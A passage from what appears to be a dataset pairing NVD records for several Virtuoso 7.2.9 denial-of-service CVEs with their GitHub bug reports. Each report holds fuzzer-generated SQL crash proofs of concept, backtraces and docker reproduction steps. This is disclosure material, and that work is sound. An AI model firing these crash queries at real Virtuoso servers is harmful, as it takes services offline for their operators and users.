CREATE INDEX t1i1 ON t1(c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,c17,c18,c19,c20,c21,c22,c23,c24,c25,c26,c27,c28,c29,c30,c31,c32,c33,c34,c35,c36,c37,c38,c39,c40,c41,c42,c43,c44,c45,c46,c47,c48,c49,c50,c51,c52,c53,c54,c55,c56,c57,c58,c59,c60,c61,c62,c63,c64,c65,c66,c67,c68,c69,c70,c71,c72,c73,c74,c75,c76,c77,c78,c79,c80,c81,c82,c83,c84,c85,c86,c87,c88,c89,c90,c91,c92,c93,c94,c95,c96,c97,c98,c99,c100,c101,c102,c103,c104,c105,c106,c107,c108,c109,c110,c111,c112,c113,c114,c115,c116,c117,c118,c119,c120,c121,c122,c123,c124,c125,c126,c127,c128,c129,c130,c131,c132,c133,c134,c135,c136,c137,c138,c139,c140,c141,c142,c143,c144,c145,c146,c147,c148,c149,c150,c151,c152,c153,c154,c155,c156,c157,c158,c159,c160,c161,c162,c163,c164,c165,c166,c167,c168,c169,c170,c171,c172,c173,c174,c175,c176,c177,c178,c179,c180,c181,c182,c183,c184,c185,c186,c187,c188,c189,c190,c191,c192,c193,c194,c195,c196,c197,c198,c199,c200,c201,c202,c203,c204,c205,c206,c207,c208,c209,c210,c211,c212,c213,c214,c215,c216,c217,c218,c219,c220,c221,c222,c223,c224,c225,c226,c227,c228,c229,c230,c231,c232,c233,c234,c235,c236,c237,c238,c239,c240,c241,c242,c243,c244,c245,c246,c247,c248,c249,c250,c251,c252,c253,c254,c255,c256,c257,c258,c259,c260,c261,c262,c263,c264,c265,c266,c267,c268,c269,c270,c271,c272,c273,c274,c275,c276,c277,c278,c279,c280,c281,c282,c283,c284,c285,c286,c287,c288,c289,c290,c291,c292,c293,c294,c295,c296,c297,c298,c299,c300,c301,c302,c303,c304,c305,c306,c307,c308,c309,c310,c311,c312,c313,c314,c315,c316,c317,c318,c319,c320,c321,c322,c323,c324,c325,c326,c327,c328,c329,c330,c331,c332,c333,c334,c335,c336,c337,c338,c339,c340,c341,c342,c343,c344,c345,c346,c347,c348,c349,c350,c351,c352,c353,c354,c355,c356,c357,c358,c359,c360,c361,c362,c363,c364,c365,c366,c367,c368,c369,c370,c371,c372,c373,c374,c375,c376,c377,c378,c379,c380,c381,c382,c383,c384,c385,c386,c387,c388,c389,c390,c391,c392,c393,c394,c395,c396,c397,c398,c399,c400,c401,c402,c403,c404,c405,c406,c407,c408,c409,c410,c411,c412,c413,c414,c415,c416,c417,c418,c419,c420,c421,c422,c423,c424,c425,c426,c427,c428,c429,c430,c431,c432,c433,c434,c435,c436,c437,c438,c439,c440,c441,c442,c443,c444,c445,c446,c447,c448,c449,c450,c451,c452,c453,c454,c455,c456,c457,c458,c459,c460,c461,c462,c463,c464,c465,c466,c467,c468,c469,c470,c471,c472,c473,c474,c475,c476,c477,c478,c479,c480,c481,c482,c483,c484,c485,c486,c487,c488,c489,c490,c491,c492,c493,c494,c495,c496,c497,c498,c499,c500,c501,c502,c503,c504,c505,c506,c507,c508,c509,c510,c511,c512,c513,c514,c515,c516,c517,c518,c519,c520,c521,c522,c523,c524,c525,c526,c527,c528,c529,c530,c531,c532,c533,c534,c535,c536,c537,c538,c539,c540,c541,c542,c543,c544,c545,c546,c547,c548,c549,c550,c551,c552,c553,c554,c555,c556,c557,c558,c559,c560,c561,c562,c563,c564,c565,c566,c567,c568,c569,c570,c571,c572,c573,c574,c575,c576,c577,c578,c579,c580,c581,c582,c583,c584,c585,c586,c587,c588,c589,c590,c591,c592,c593,c594,c595,c596,c597,c598,c599,c600,c601,c602,c603,c604,c605,c606,c607,c608,c609,c610,c611,c612,c613,c614,c615,c616,c617,c618,c619,c620,c621,c622,c623,c624,c625,c626,c627,c628,c629,c630,c631,c632,c633,c634,c635,c636,c637,c638,c639,c640,c641,c642,c643,c644,c645,c646,c647,c648,c649,c650,c651,c652,c653,c654,c655,c656,c657,c658,c659,c660,c661,c662,c663,c664,c665,c666,c667,c668,c669,c670,c671,c672,c673,c674,c675,c676,c677,c678,c679,c680,c681,c682,c683,c684,c685,c686,c687,c688,c689,c690,c691,c692,c693,c694,c695,c696,c697,c698,c699,c700,c701,c702,c703,c704,c705,c706,c707,c708,c709,c710,c711,c712,c713,c714,c715,c716,c717,c718,c719,c720,c721,c722,c723,c724,c725,c726,c727,c728,c729,c730,c731,c732,c733,c734,c735,c736,c737,c738,c739,c740,c741,c742,c743,c744,c745,c746,c747,c748,c749,c750,c751,c752,c753,c754,c755,c756,c757,c758,c759,c760,c761,c762,c763,c764,c765,c766,c767,c768,c769,c770,c771,c772,c773,c774,c775,c776,c777,c778,c779,c780,c781,c782,c783,c784,c785,c786,c787,c788,c789,c790,c791,c792,c793,c794,c795,c796,c797,c798,c799,c800,c801,c802,c803,c804,c805,c806,c807,c808,c809,c810,c811,c812,c813,c814,c815,c816,c817,c818,c819,c820,c821,c822,c823,c824,c825,c826,c827,c828,c829,c830,c831,c832,c833,c834,c835,c836,c837,c838,c839,c840,c841,c842,c843,c844,c845,c846,c847,c848,c849,c850,c851,c852,c853,c854,c855,c856,c857,c858,c859,c860,c861,c862,c863,c864,c865,c866,c867,c868,c869,c870,c871,c872,c873,c874,c875,c876,c877,c878,c879,c880,c881,c882,c883,c884,c885,c886,c887,c888,c889,c890,c891,c892,c893,c894,c895,c896,c897,c898,c899,c900,c901,c902,c903,c904,c905,c906,c907,c908,c909,c910,c911,c912,c913,c914,c915,c916,c917,c918,c919,c920,c921,c922,c923,c924,c925,c926,c927,c928,c929,c930,c931,c932,c933,c934,c935,c936,c937,c938,c939,c940,c941,c942,c943,c944,c945,c946,c947,c948,c949,c950,c951,c952,c953,c954,c955,c956,c957,c958,c959,c960,c961,c962,c963,c964,c965,c966,c967,c968,c969,c970,c971,c972,c973,c974,c975,c976,c977,c978,c979,c980,c981,c982,c983,c984,c985,c986,c987,c988,c989,c990,c991,c992,c993,c994,c995,c996,c997,c998,c999,c1000);
```
backtrace:
```c
#0 0x7f073bac91fe (__libc_malloc+0x11e)
#1 0xe1e59b (dk_alloc_reserve_malloc+0x2b)
#2 0xde1ce0 (dk_alloc+0x30)
#3 0xde4cc7 (dk_alloc_box+0x197)
#4 0x7c345b (qr_rec_exec+0xab)
#5 0x4d7c8d (ddl_create_key+0xad)
#6 0x7f07040db688 -- no symbol name found
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at __libc_malloc | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1120/comments | 0 | 2023-04-12T18:42:34Z | 2023-04-14T08:12:11Z | https://github.com/openlink/virtuoso-opensource/issues/1120 | 1,665,064,064 | 1,120 | 5,126 |
CVE-2023-31608 | 2023-05-15T15:15:11.623 | An issue in the artm_div_int component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1123"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1123"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1123 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT CAST('-9223372036854775808' AS INTEGER) / CAST('-1' AS SMALLINT);
```
backtrace:
```c
#0 0xc227a4 (artm_div_int+0xf4)
#1 0xc23766 (artm_vec+0x7d6)
#2 0x7518c2 (code_vec_run_v+0x10e2)
#3 0x7ac3ff (qn_input+0x38f)
#4 0x7ac8a6 (qn_send_output+0x236)
#5 0x81e26d (set_ctr_vec_input+0x94d)
#6 0x7ac43e (qn_input+0x3ce)
#7 0x7bdc6e (qr_exec+0x11ee)
#8 0x7cb446 (sf_sql_execute+0x11a6)
#9 0x7cbf4e (sf_sql_execute_w+0x17e)
#10 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#11 0xe1f01c (future_wrapper+0x3fc)
#12 0xe2691e (_thread_boot+0x11e)
#13 0x7eff81a0c609 (start_thread+0xd9)
#14 0x7eff817dc133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at artm_div_int | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1123/comments | 0 | 2023-04-12T18:49:08Z | 2023-04-14T08:12:12Z | https://github.com/openlink/virtuoso-opensource/issues/1123 | 1,665,072,694 | 1,123 | 5,127 |
CVE-2023-31609 | 2023-05-15T15:15:11.673 | An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1126"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1126"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1126 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE b (
folders VARCHAR(80),
folderid VARCHAR(80),
parentid VARCHAR(80),
rootid VARCHAR(80),
c INTEGER,
path VARCHAR(80),
id VARCHAR(80),
i VARCHAR(80),
d VARCHAR(80),
e VARCHAR(80),
f VARCHAR(80)
);
SELECT case b.d when coalesce((select max(17+coalesce((select max(coalesce((select (select count(distinct case f when 19 then coalesce((select coalesce((select max(11-(abs(d)/abs(11))) from b where not -c in (19,b.d,17)),17) from b where (f in (d,f,b.c))),d) else d end) from b) from b where 17 between e and b.f),b.c)) from b where 13>=e),d)) from b where b.f>b.f),b.d) then 17 else b.f end FROM b WHERE not exists(select 1 from b where 13 between c+17 and (b.id));
```
backtrace:
```c
#0 0x739343 (dfe_unit_col_loci+0x1393)
#1 0x739030 (dfe_unit_col_loci+0x1080)
#2 0x747e8c (sqlg_top_1+0x7c)
#3 0x70d4d4 (sqlo_top_select+0x164)
#4 0x6b72bf (sql_stmt_comp+0x8bf)
#5 0x6ba122 (sql_compile_1+0x1a62)
#6 0x7c8cd0 (stmt_set_query+0x340)
#7 0x7cabc2 (sf_sql_execute+0x922)
#8 0x7cbf4e (sf_sql_execute_w+0x17e)
#9 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#10 0xe1f01c (future_wrapper+0x3fc)
#11 0xe2691e (_thread_boot+0x11e)
#12 0x7fb2a20b9609 (start_thread+0xd9)
#13 0x7fb2a1e89133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at dfe_unit_col_loci | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1126/comments | 1 | 2023-04-12T18:58:35Z | 2023-04-17T19:06:54Z | https://github.com/openlink/virtuoso-opensource/issues/1126 | 1,665,085,302 | 1,126 | 5,128 |
CVE-2023-31610 | 2023-05-15T15:15:11.720 | An issue in the _IO_default_xsputn component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1118"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1118 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t2(x VARCHAR, y VARCHAR, c VARCHAR);
CREATE VIEW t2 AS SELECT * FROM t2;
INSERT INTO t2 VALUES(8,8,RDF_SYS.xsd_hexBinary_fromBinary(SYSTEM_BASE64_ENCODE(zeroblob(200))));
```
backtrace:
```c
#0 0x7f87bcd56050 (_IO_default_xsputn+0xa0)
#1 0x7f87bcd3b0fc (psiginfo+0x13c9c)
#2 0x7f87bcd4ff9a (vscanf+0x14a)
#3 0x7f87bcd25df6 (__snprintf+0x96)
#4 0x5a2227 (sch_full_proc_name_1+0x2c7)
#5 0x7879a3 (sinv_find_func_map+0x143)
#6 0x788fb7 (sinv_check_exp+0x317)
#7 0x78a03d (sinv_sqlo_check_col_val+0xad)
#8 0x816d50 (sqlc_insert_view+0x330)
#9 0x81721d (sqlc_insert_view+0x7fd)
#10 0x81721d (sqlc_insert_view+0x7fd)
...
#5714 0x81721d (sqlc_insert_view+0x7fd)
#5715 0x81721d (sqlc_insert_view+0x7fd)
#5716 0x81721d (sqlc_insert_view+0x7fd)
#5717 0x6b7387 (sql_stmt_comp+0x987)
#5718 0x6ba122 (sql_compile_1+0x1a62)
#5719 0x7c8cd0 (stmt_set_query+0x340)
#5720 0x7cabc2 (sf_sql_execute+0x922)
#5721 0x7cbf4e (sf_sql_execute_w+0x17e)
#5722 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#5723 0xe1f01c (future_wrapper+0x3fc)
#5724 0xe2691e (_thread_boot+0x11e)
#5725 0x7f87bd013609 (start_thread+0xd9)
#5726 0x7f87bcde3133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at _IO_default_xsputn | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1118/comments | 0 | 2023-04-12T18:33:19Z | 2023-04-14T08:12:10Z | https://github.com/openlink/virtuoso-opensource/issues/1118 | 1,665,051,847 | 1,118 | 5,129 |
CVE-2023-31611 | 2023-05-15T15:15:11.770 | An issue in the __libc_longjmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1119"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1119 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE hist (
cnt VARCHAR NOT NULL,
y VARCHAR NOT NULL,
z VARCHAR,
PRIMARY KEY (cnt,y)
);
CREATE TABLE t19d AS (SELECT * FROM hist UNION ALL SELECT 1234);
```
backtrace:
```c
#0 0x7f523bf87dbe (__libc_longjmp+0xde)
#1 0x5177d573a547bfaf -- no symbol name found
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at __libc_longjmp | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1119/comments | 0 | 2023-04-12T18:38:29Z | 2023-04-14T08:12:10Z | https://github.com/openlink/virtuoso-opensource/issues/1119 | 1,665,059,115 | 1,119 | 5,130 |
CVE-2023-31612 | 2023-05-15T15:15:11.813 | An issue in the dfe_qexp_list component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1125"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1125"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1125 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x VARCHAR,
y VARCHAR
);
SELECT IFNULL(MIN(x), -1), IFNULL(MAX(x), -1)
FROM (
SELECT x FROM t1 UNION ALL
SELECT NULL
) AS temp;
```
backtrace:
```c
#0 0x737010 (dfe_qexp_list+0x40)
#1 0x73711d (dfe_qexp_list+0x14d)
#2 0x7474c9 (dfe_union_dfe+0xc9)
#3 0x747878 (sqlg_set_ts_order+0x198)
#4 0x747efd (sqlg_top_1+0xed)
#5 0x70d4d4 (sqlo_top_select+0x164)
#6 0x6b72bf (sql_stmt_comp+0x8bf)
#7 0x6ba122 (sql_compile_1+0x1a62)
#8 0x7c8cd0 (stmt_set_query+0x340)
#9 0x7cabc2 (sf_sql_execute+0x922)
#10 0x7cbf4e (sf_sql_execute_w+0x17e)
#11 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#12 0xe1f01c (future_wrapper+0x3fc)
#13 0xe2691e (_thread_boot+0x11e)
#14 0x7f460b246609 (start_thread+0xd9)
#15 0x7f460b016133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at dfe_qexp_list | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1125/comments | 1 | 2023-04-12T18:52:59Z | 2023-04-17T19:07:44Z | https://github.com/openlink/virtuoso-opensource/issues/1125 | 1,665,077,173 | 1,125 | 5,131 |
CVE-2023-31613 | 2023-05-15T15:15:11.867 | An issue in the __nss_database_lookup component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1121"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
